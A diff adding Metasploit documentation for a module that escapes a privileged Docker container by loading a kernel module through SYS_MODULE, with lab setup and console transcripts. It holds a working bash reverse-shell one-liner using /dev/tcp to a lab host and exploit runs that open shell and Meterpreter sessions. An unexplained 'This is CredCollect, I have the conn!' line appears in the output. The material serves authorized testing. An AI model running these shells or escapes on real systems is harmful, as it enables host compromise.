diff --git a/documentation/modules/exploit/linux/local/docker_privileged_container_kernel_escape.md b/documentation/modules/exploit/linux/local/docker_privileged_container_kernel_escape.md new file mode 100644 index 0000000000..fd34ba8795 --- /dev/null +++ b/documentation/modules/exploit/linux/local/docker_privileged_container_kernel_escape.md @@ -0,0 +1,106 @@ +## Vulnerable Application + +This module performs a container escape onto the host as the daemon user. It +takes advantage of the SYS_MODULE capability. If that exists and the linux +headers are available to compile on the target, then we can escape onto the host. + +### Creating A Testing Environment + +- Get a VM that you want to test on (or your own machine) +- Install Docker +- Run a listener (can be anything but well use an example of a bash reverse shell) +```msf +msf6 > use payload/cmd/unix/reverse_bash +msf6 payload(cmd/unix/reverse_bash) > set lhost vboxnet0 +lhost => 192.168.56.1 +msf6 payload(cmd/unix/reverse_bash) > generate -f raw +bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118' +msf6 payload(cmd/unix/reverse_bash) > exploit -z +[*] Payload Handler Started as Job 0 +msf6 payload(cmd/unix/reverse_bash) > +[*] [2023.11.07-21:28:57] Started reverse TCP handler on 192.168.56.1:4444 +``` +- Create a privileged container (forwarding port 4444 in this example in order to use a bind shell from the host. Container must be the same OS as host) +```bash +docker run --rm -it -p 4444:4444 --cap-add SYS_MODULE ubuntu bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118' +``` +- Inside your session, install the required packages to run. Package manager will differ to OS, for debian as an example +```bash +apt update && apt install -y gcc make kmod linux-headers-$(uname -r) +``` + +## Verification Steps + +1. start msfconsole +2. get a session +1. `use exploit/linux/local/docker_privileged_container_kernel_escape` +2. `set SESSION [session]` +3. `set PAYLOAD [payload]` +6. `exploit` + +## Options + +### KernelModuleName + +The name that the kernel module will be called in the system. The default if no name is set is "{rand(8)}" + +### WritableContainerDir + +A directory where we can write files inside the container (default is /tmp/.{rand(4)}). This is needed to drop the payload into the container. + +### ReloadKernelModule + +Rebuilds and reloads kernel module if its already loaded in case of repeat runs. + +## Scenarios + +### Container Escape from debian linux with reverse bash + +```msf +msf6 > sessions -i 1 -c "apt update && apt install -y gcc make kmod linux-headers-$(uname -r)" +[*] Running 'apt update && apt install -y gcc make kmod linux-headers-$(uname -r)' on shell session 1 (192.168.56.126) +msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape +[*] Using configured payload cmd/unix/reverse_bash +msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 1 +session => 1 +msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check +[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable +msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z + +[*] [2023.11.07-21:42:40] Started reverse TCP handler on 192.168.56.1:4444 +[*] [2023.11.07-21:42:42] Creating files +[*] [2023.11.07-21:42:43] Making kernel module +[+] [2023.11.07-21:42:43] Kernel module compiled successfully +[*] [2023.11.07-21:42:43] Loading kernel module +[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.126:60974) at 2023-11-07 21:42:50 -0500 +[*] This is CredCollect, I have the conn! +``` + +### Container Escape from arch linux with meterpreter + +```msf +msf6 > sessions -i 2 -c "pacman -Syy --noconfirm gcc glibc make linux-headers" +[*] Running 'pacman -Syy --noconfirm gcc glibc make linux-headers' on shell session 2 (192.168.56.106) +msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape +[*] Using configured payload cmd/unix/reverse_bash +msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 2 +session => 2 +msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp +payload => cmd/linux/http/x64/meterpreter/reverse_tcp +msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set lhost vboxnet0 +lhost => vboxnet0 +msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check +[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable +msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z + +[*] [2023.11.07-21:48:40] Started reverse TCP handler on 192.168.56.1:4444 +[*] [2023.11.07-21:48:41] Creating files +[*] [2023.11.07-21:48:43] Making kernel module +[+] [2023.11.07-21:48:44] Kernel module compiled successfully +[*] [2023.11.07-21:48:44] Loading kernel module +[*] [2023.11.07-21:48:44] Sending stage (3045380 bytes) to 192.168.56.106 +[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.106:50402) at 2023-11-07 21:48:45 -0500 +[*] This is CredCollect, I have the conn! +[!] [2023.11.07-21:48:45] Attempting to delete working directory /tmp/.IvLx +[*] Session 4 created in the background. +```